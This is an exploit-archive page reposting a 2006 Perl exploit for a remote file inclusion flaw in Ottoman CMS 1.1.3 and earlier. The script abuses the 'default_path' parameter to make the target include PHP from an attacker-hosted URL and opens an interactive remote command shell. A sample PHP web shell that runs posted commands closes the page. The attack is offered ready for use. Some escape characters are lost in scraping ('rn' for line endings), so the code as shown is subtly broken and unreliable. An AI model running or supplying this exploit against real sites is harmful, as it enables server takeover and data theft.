Ottoman CMS <= 1.1.3 (default_path) Remote File Inclusion Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Ottoman CMS <= 1.1.3 (default_path) Remote File Inclusion Exploit
# Published : 2006-07-09
# Author : Jacek Wlodarczyk
# Previous Title : Sabdrimer PRO <= 2.2.4 (pluginpath) Remote File Include Vulnerability
# Next Title : SimpleBoard Mambo Component <= 1.1.0 Remote Include Vulnerability

#!/usr/bin/perl
use IO::Socket;


################################################################################
#                                                                              #
#         Jacek Wlodarczyk (j4ck) - jacekwlo[at]gmail[dot]com                  #
#                                                                              #
################################################################################




#Title:       Ottoman CMS <= 1.1.3 Remote File Inclusion Exploit
#Application: Ottoman Content Management System
#Version:     1.1.3 and prior
#Url:         http://www.lowter.com/p/ottoman



#Affected software description:

#Input passed to the "default_path" parameter in "index.php", "error.php", "classes/main_class.php", "format_css.php", "js.php",
#and "rss.php" is not properly sanitized before being used to include files.
#Vulnerable scripts not properly sanitizing user-supplied input to the 'POST' and 'COOKIE' variables.
#This can be exploited to execute arbitrary PHP code by including files from local or external resources.
#Exploitation requires turn ON "register_globals"

#PoC Exploit (POST method):



if (@ARGV ne 4)
  {
    &usage;
  }


sub usage()
{
  print "rn (c) Jacek Wlodarczyk (j4ck)rnrn";
  print "- Exploit for Ottoman CMS <= 1.1.3rnrn";
  print "- Usage: $0 <target> <script location> <shell location> <shell variable>rn";
  print "- <target>             -> Victim's target eg: http://www.victim.comrn";
  print "- <script location>    -> Path to script  eg: /ottoman/error.phprn";
  print "- <cmd shell location> -> eg: http://www.site.com/sh_dir/rn";
  print "- <cmd shell variable> -> eg: cmdrnrn";
  print "- Eg: http://127.0.0.1 /ottoman_v1.1.3/index.php http://10.0.0.10/sh_dir/ cmdrnrn";
  exit();
}




$HOST     = $ARGV[0];
$DIR      = $ARGV[1];
$INC_FILE = $ARGV[2];
$CMD      = $ARGV[3];
$COMMAND  = '';

print "rnATTACKING : ".$HOST.$DIR."rnrn";
$HOST =~ s/(http://)//;
       

while()
  {

    print "[shell] $";
    chomp($COMMAND = <STDIN>);
    if ($COMMAND eq "q")
      {
        exit;
      }

    if (!$COMMAND)
      {
        print "nPlease Enter a Commandnn";
        next;
      }


    $data="default_path=".$INC_FILE."&".$CMD."=".$COMMAND;
    $post = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "Error 404rnrn";

    print $post "POST ".$DIR." HTTP/1.1rn";
    print $post "Host: ".$HOST."rn";
    print $post "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4rn";
    print $post "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5rn";
    print $post "Accept-Language: en-us;q=0.7,en;q=0.3rn";
    print $post "Accept-Encoding: gzip,deflatern";
    print $post "Connection: Keep-Alivern";
    print $post "Keep-Alive: 300rn";
    print $post "Cache-Control: no-cachern";
    print $post "Content-Type: application/x-www-form-urlencodedrn";
    print $post "Content-Length: ".length($data)."rn";
    print $post "Connection: closernrn";
    print $post $data."rn";





    while ($ans = <$post>)
      {
        if ($ans =~ /404/ )
          {
            printf "nnFile ".$ARGV[1]." no exists.rnrn";
            exit;
          }
        printf $ans;
      }

  }
exit;


#Shell example:

#config.php
#------cut---------------
#<?
#passthru($_POST['cmd']);
#?>
#------cut---------------

# www.Syue.com [2006-07-09]